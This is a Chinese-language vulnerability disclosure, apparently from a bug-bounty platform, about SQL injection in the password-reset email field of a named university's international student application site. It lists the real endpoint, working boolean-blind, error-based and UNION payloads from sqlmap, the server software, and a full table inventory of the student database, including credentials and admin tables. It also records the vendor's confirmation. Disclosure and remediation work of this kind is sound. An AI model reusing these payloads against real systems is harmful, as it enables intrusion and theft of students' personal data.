2015-10-27: 细节已通知厂商并且等待厂商处理中 2015-10-27: 厂商已经确认,细节仅向厂商公开 2015-11-06: 细节向核心白帽子及相关领域专家公开 2015-11-16: 细节向普通白帽子公开 2015-11-26: 细节向实习白帽子公开 2015-12-11: 细节向公众公开
浙江工业大学某系统SQL注入漏洞
http://www.apply.zjut.edu.cn/en/student/login/fpassword (POST)findpassword=Reset Password&code=Verification Code&email=1'
email参数存在注入
内有大量留学生信息
Place: POSTParameter: email Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: findpassword=Reset Password&code=Verification Code&email=-5404%' OR (6778=6778)# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: findpassword=Reset Password&code=Verification Code&email=-6171%' OR 1 GROUP BY CONCAT(0x7161716371,(SELECT (CASE WHEN (9966=9966) THEN 1 ELSE 0 END)),0x71766f7771,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: UNION query Title: MySQL UNION query (random number) - 35 columns Payload: findpassword=Reset Password&code=Verification Code&email=-5577%' UNION ALL SELECT 3639,3639,3639,3639,3639,3639,3639,CONCAT(0x7161716371,0x4b64794b4b486c596d43,0x71766f7771),3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639#---web application technology: Apache 2.4.12, PHP 5.5.24back-end DBMS: MySQL 5Database: apply+------------------------------------------+---------+| Table | Entries |+------------------------------------------+---------+| cucas_formitem | 30517 || cucas_apply_template_info | 22935 || cucas_formtopic | 14093 || cucas_attachmentstopic | 6515 || cucas_apply_history | 5081 || cucas_templateclass | 4090 || cucas_apply_attachment_info | 1628 || cucas_admin_logs | 969 || cucas_system_group_menu | 927 || cucas_student_info | 660 || cucas_apply_info | 439 || cucas_app_log | 373 || cucas_major | 248 || cucas_apply_order_info | 174 || cucas_budget | 174 || cucas_deposit_info | 169 || cucas_app_getoffer | 161 || cucas_print_fields | 159 || cucas_message | 128 || cucas_message_record | 84 || cucas_user_message | 84 || cucas_school_accommodation_prices | 82 || cucas_credentials | 69 || cucas_mail_record | 54 || cucas_applyscholarship_info | 52 || cucas_admin_info | 26 || cucas_category_info | 26 || cucas_message_log | 24 || cucas_mail_dot | 23 || cucas_pages_info | 20 || cucas_print_template | 19 || cucas_faculty | 18 || cucas_buliding_floor_room | 17 || cucas_user_room | 16 || cucas_theme_file | 15 || cucas_major_course | 11 || cucas_system_group | 11 || cucas_agency_info | 9 || cucas_quarterage_info | 8 || cucas_module_info | 7 || cucas_room_electric_user | 7 || cucas_ppt_info | 6 || cucas_insurance_info | 5 || cucas_room_electric_record | 5 || cucas_school_accommodation_campus_info | 5 || cucas_attachments | 4 || cucas_degree_info | 4 || cucas_scholarship_info | 4 || cucas_school_accommodation_buliding | 4 || cucas_theme_info | 4 || cucas_commission_record | 3 || cucas_school_accommodation_buliding_info | 3 || cucas_image_info | 2 || cucas_landlord_info | 2 || cucas_major_content | 2 || cucas_major_images | 2 || cucas_major_pl | 2 || cucas_notice_info | 2 || cucas_out_room | 2 || cucas_school_accommodation_campus | 2 || cucas_school_accommodation_prices_info | 2 || cucas_test_paper | 2 || cucas_paypal | 1 || cucas_pickup_info | 1 || cucas_question_info | 1 |+------------------------------------------+---------+
参数检查过滤
危害等级:中
漏洞Rank:9
确认时间:2015-10-27 16:54
谢谢你的帮助,我们会尽快处理的
暂无
